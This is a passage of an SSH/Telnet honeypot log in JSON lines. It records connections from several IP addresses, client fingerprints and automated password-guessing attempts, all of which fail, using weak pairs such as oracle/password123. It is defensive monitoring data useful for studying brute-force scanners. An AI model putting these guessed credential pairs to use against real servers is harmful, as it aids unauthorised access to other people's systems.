openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:17:20.987431Z","src_ip":"212.227.235.229","session":"39c5375ac5da"}
{"eventid":"cowrie.login.failed","username":"github","password":"123","message":"login attempt [github/123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:17:21.957408Z","src_ip":"212.227.235.229","session":"39c5375ac5da"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:17:23.264573Z","src_ip":"212.227.235.229","session":"39c5375ac5da"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":52752,"dst_ip":"1.2.3.4","dst_port":22,"session":"985eddd0e93c","protocol":"ssh","message":"New connection: 196.251.86.249:52752 (1.2.3.4:22) [session: 985eddd0e93c]","sensor":"my-vps","timestamp":"2025-08-26T10:18:09.490620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:18:09.850750Z","src_ip":"196.251.86.249","session":"985eddd0e93c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:18:10.653773Z","src_ip":"196.251.86.249","session":"985eddd0e93c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwer1234","message":"login attempt [oracle/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:18:12.298177Z","src_ip":"196.251.86.249","session":"985eddd0e93c"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:18:14.121508Z","src_ip":"196.251.86.249","session":"985eddd0e93c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54684,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af80685c0dd","protocol":"ssh","message":"New connection: 196.251.86.249:54684 (1.2.3.4:22) [session: 0af80685c0dd]","sensor":"my-vps","timestamp":"2025-08-26T10:19:11.636248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:19:12.283132Z","src_ip":"196.251.86.249","session":"0af80685c0dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:19:12.284209Z","src_ip":"196.251.86.249","session":"0af80685c0dd"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password123","message":"login attempt [oracle/password123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:19:14.408517Z","src_ip":"196.251.86.249","session":"0af80685c0dd"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:19:15.899488Z","src_ip":"196.251.86.249","session":"0af80685c0dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52104,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d0169779283","protocol":"telnet","message":"New connection: 212.227.125.160:52104 (1.2.3.4:23) [session: 8d0169779283]","sensor":"my-vps","timestamp":"2025-08-26T10:19:40.802856Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53540,"dst_ip":"1.2.3.4","dst_port":22,"session":"7da441fde2a3","protocol":"ssh","message":"New connection: 212.227.235.229:53540 (1.2.3.4:22) [session: 7da441fde2a3]","sensor":"my-vps","timestamp":"2025-08-26T10:19:48.366227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:19:48.380577Z","src_ip":"212.227.235.229","session":"7da441fde2a3"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:19:48.666992Z","src_ip":"212.227.235.229","session":"7da441fde2a3"}
{"eventid":"cowrie.login.failed","username":"news","password":"news","message":"login attempt [news/news] failed","sensor":"my-vps","timestamp":"2025-08-26T10:19:49.583539Z","src_ip":"212.227.235.229","session":"7da441fde2a3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:19:50.882527Z","src_ip":"212.227.235.229","session":"7da441fde2a3"}
{"eventid":"cowrie.session.closed","duration":30.857857704162598,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:11.660638Z","src_ip":"212.227.125.160","session":"8d0169779283"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56128,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b50d42f3dc8","protocol":"ssh","message":"New connection: 196.251.86.249:56128 (1.2.3.4:22) [session: 7b50d42f3dc8]","sensor":"my-vps","timestamp":"2025-08-26T10:20:13.301084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:13.945391Z","src_ip":"196.251.86.249","session":"7b50d42f3dc8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:20:13.946520Z","src_ip":"196.251.86.249","session":"7b50d42f3dc8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty123456","message":"login attempt [oracle/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:20:16.056295Z","src_ip":"196.251.86.249","session":"7b50d42f3dc8"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:18.543507Z","src_ip":"196.251.86.249","session":"7b50d42f3dc8"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":41536,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f07fa070833","protocol":"ssh","message":"New connection: 14.103.129.89:41536 (1.2.3.4:22) [session: 1f07fa070833]","sensor":"my-vps","timestamp":"2025-08-26T10:20:21.257399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:21.258410Z","src_ip":"14.103.129.89","session":"1f07fa070833"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T10:20:21.444513Z","src_ip":"14.103.129.89","session":"1f07fa070833"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":53322,"dst_ip":"1.2.3.4","dst_port":22,"session":"97738219fe64","protocol":"ssh","message":"New connection: 14.103.129.89:53322 (1.2.3.4:22) [session: 97738219fe64]","sensor":"my-vps","timestamp":"2025-08-26T10:20:26.619767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:26.620638Z","src_ip":"14.103.129.89","session":"97738219fe64"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":47028,"dst_ip":"1.2.3.4","dst_port":22,"session":"286ae9d1b7a5","protocol":"ssh","message":"New connection: 14.103.129.89:47028 (1.2.3.4:22) [session: 286ae9d1b7a5]","sensor":"my-vps","timestamp":"2025-08-26T10:20:26.663029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:26.663895Z","src_ip":"14.103.129.89","session":"286ae9d1b7a5"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:28.669277Z","src_ip":"14.103.129.89","session":"1f07fa070833"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:29.577211Z","src_ip":"14.103.129.89","session":"97738219fe64"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":40052,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e34fd0b9e17","protocol":"ssh","message":"New connection: 14.103.129.89:40052 (1.2.3.4:22) [session: 9e34fd0b9e17]","sensor":"my-vps","timestamp":"2025-08-26T10:20:34.505341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:34.506500Z","src_ip":"14.103.129.89","session":"9e34fd0b9e17"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:20:34.647475Z","src_ip":"14.103.129.89","session":"97738219fe64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:34.694154Z","src_ip":"14.103.129.89","session":"9e34fd0b9e17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:36.172824Z","src_ip":"14.103.129.89","session":"286ae9d1b7a5"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:20:36.310431Z","src_ip":"14.103.129.89","session":"97738219fe64"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":42208,"dst_ip":"1.2.3.4","dst_port":22,"session":"20b528f63d60","protocol":"ssh","message":"New connection: 14.103.129.89:42208 (1.2.3.4:22) [session: 20b528f63d60]","sensor":"my-vps","timestamp":"2025-08-26T10:20:36.404752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:36.405756Z","src_ip":"14.103.129.89","session":"20b528f63d60"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":49022,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bcfa8632e21","protocol":"ssh","message":"New connection: 14.103.129.89:49022 (1.2.3.4:22) [session: 4bcfa8632e21]","sensor":"my-vps","timestamp":"2025-08-26T10:20:38.711722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:38.712609Z","src_ip":"14.103.129.89","session":"4bcfa8632e21"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":52762,"dst_ip":"1.2.3.4","dst_port":22,"session":"432a848a47e4","protocol":"ssh","message":"New connection: 14.103.129.89:52762 (1.2.3.4:22) [session: 432a848a47e4]","sensor":"my-vps","timestamp":"2025-08-26T10:20:39.899673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:39.900682Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:20:42.246535Z","src_ip":"14.103.129.89","session":"432a848a47e4"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":39348,"dst_ip":"1.2.3.4","dst_port":22,"session":"f153adf78238","protocol":"ssh","message":"New connection: 14.103.129.89:39348 (1.2.3.4:22) [session: f153adf78238]","sensor":"my-vps","timestamp":"2025-08-26T10:20:44.246186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:20:44.247106Z","src_ip":"14.103.129.89","session":"f153adf78238"}
